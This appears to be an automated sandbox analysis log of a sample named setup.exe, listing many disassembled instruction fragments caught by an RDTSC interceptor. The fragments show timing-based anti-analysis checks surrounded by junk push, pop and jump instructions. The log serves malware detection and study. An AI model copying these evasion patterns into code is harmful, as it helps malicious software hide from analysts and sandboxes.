Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68783E second address: 687872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Fh 0x00000009 js 00007FC169461A96h 0x0000000f jmp 00007FC169461AA7h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 688F74 second address: 688F7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E150 second address: 68E158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E2B1 second address: 68E2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E2B5 second address: 68E2B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E68B second address: 68E6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A284h 0x00000007 jmp 00007FC16945A282h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E6BB second address: 68E6ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC169461A9Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 68E6ED second address: 68E6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 693760 second address: 693764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 693764 second address: 693771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DC2 second address: 6A2DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DDC second address: 6A2DE9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DE9 second address: 6A2DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6A2DF2 second address: 6A2E1E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FC16945A285h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B0635 second address: 6B063F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B063F second address: 6B065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A289h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B065C second address: 6B067A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC169461AA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B067A second address: 6B0699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FC16945A288h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B3476 second address: 6B347E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B347E second address: 6B3482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B3482 second address: 6B3486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B31CD second address: 6B31D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6B31D1 second address: 6B31E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC169461A98h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f js 00007FC169461AA0h 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CBDD5 second address: 6CBE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC16945A286h 0x0000000b jmp 00007FC16945A27Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CBE03 second address: 6CBE19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC169461A96h 0x00000008 jmp 00007FC169461A9Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CBE19 second address: 6CBE79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC16945A283h 0x00000008 jmp 00007FC16945A284h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007FC16945A2A5h 0x00000020 jmp 00007FC16945A27Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC16945A281h 0x0000002c jbe 00007FC16945A276h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB039 second address: 6CB043 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB043 second address: 6CB063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 jo 00007FC16945A276h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB063 second address: 6CB069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB58C second address: 6CB590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CB590 second address: 6CB5B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC169461AA9h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CE7C6 second address: 6CE7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6CE84C second address: 6CE856 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D00F7 second address: 6D00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D1BBD second address: 6D1BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D1BC1 second address: 6D1BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D178C second address: 6D17AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FC169461A9Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D17AB second address: 6D17B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D3521 second address: 6D353A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D353A second address: 6D353E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D353E second address: 6D3552 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6D3552 second address: 6D3563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007FC16945A276h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110160 second address: 5110187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461AA9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110187 second address: 5110197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A27Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100042 second address: 5100056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100056 second address: 5100128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FC16945A27Ah 0x0000001a jmp 00007FC16945A285h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC16945A27Ch 0x00000029 adc cx, B4C8h 0x0000002e jmp 00007FC16945A27Bh 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007FC16945A288h 0x0000003a add ah, 00000028h 0x0000003d jmp 00007FC16945A27Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 pushad 0x00000047 call 00007FC16945A280h 0x0000004c mov bh, ah 0x0000004e pop edi 0x0000004f popad 0x00000050 pop ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007FC16945A27Fh 0x0000005a add si, CDCEh 0x0000005f jmp 00007FC16945A289h 0x00000064 popfd 0x00000065 push eax 0x00000066 pop edi 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100128 second address: 5100144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130B1A second address: 5130B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC16945A27Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D00DF second address: 50D012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1C78C7E3h 0x00000008 pushfd 0x00000009 jmp 00007FC169461AA8h 0x0000000e xor ecx, 5E5AB828h 0x00000014 jmp 00007FC169461A9Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC169461AA5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D012D second address: 50D0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0133 second address: 50D0137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0137 second address: 50D013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D013B second address: 50D0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b mov bh, 9Eh 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pushfd 0x00000010 jmp 00007FC169461AA8h 0x00000015 adc cl, 00000018h 0x00000018 jmp 00007FC169461A9Bh 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC169461AA2h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D025E second address: 50D0264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0BCA second address: 50D0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0BCF second address: 50D0C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC16945A27Dh 0x0000000a or cl, FFFFFF86h 0x0000000d jmp 00007FC16945A281h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 pushad 0x00000019 call 00007FC16945A27Ah 0x0000001e pop eax 0x0000001f push ebx 0x00000020 pop ecx 0x00000021 popad 0x00000022 push ebx 0x00000023 mov ecx, 3C8DCE79h 0x00000028 pop esi 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC16945A27Bh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0C20 second address: 50D0CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC169461A9Eh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, 2AA8293Dh 0x00000016 pushfd 0x00000017 jmp 00007FC169461A9Ah 0x0000001c adc si, 6B18h 0x00000021 jmp 00007FC169461A9Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FC169461AA9h 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 pushad 0x00000031 movzx esi, di 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 popad 0x00000038 push dword ptr [ebp+14h] 0x0000003b jmp 00007FC169461AA7h 0x00000040 push dword ptr [ebp+10h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0CB7 second address: 50D0CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0CBB second address: 50D0CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D3E second address: 50D0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, CBh 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D50 second address: 50D0D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D54 second address: 50D0D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D58 second address: 50D0D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D5E second address: 50D0D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D64 second address: 50D0D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0D99 second address: 50E0E30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC16945A284h 0x00000011 sub ecx, 21AAC2F8h 0x00000017 jmp 00007FC16945A27Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC16945A288h 0x00000023 adc ah, 00000058h 0x00000026 jmp 00007FC16945A27Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f push esi 0x00000030 movsx edx, cx 0x00000033 pop eax 0x00000034 popad 0x00000035 xchg eax, ebp 0x00000036 jmp 00007FC16945A289h 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0E30 second address: 50E0E43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0E43 second address: 50E0E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0E49 second address: 50E0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0B3D second address: 50E0B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0B41 second address: 50E0B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0B54 second address: 50E0B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, si 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC16945A280h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51606CF second address: 51606D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51606D5 second address: 51606D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51606D9 second address: 51606DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150A96 second address: 5150A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 515090C second address: 5150912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150912 second address: 5150916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150916 second address: 515091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 515091A second address: 5150966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FC16945A27Fh 0x00000010 mov ebp, esp 0x00000012 jmp 00007FC16945A286h 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC16945A287h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150966 second address: 515096C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F01FB second address: 50F0216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A287h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0216 second address: 50F0232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC169461AA1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0232 second address: 50F0261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov esi, 23BE3273h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 mov cx, 9E63h 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0261 second address: 50F0268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0268 second address: 50F026D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
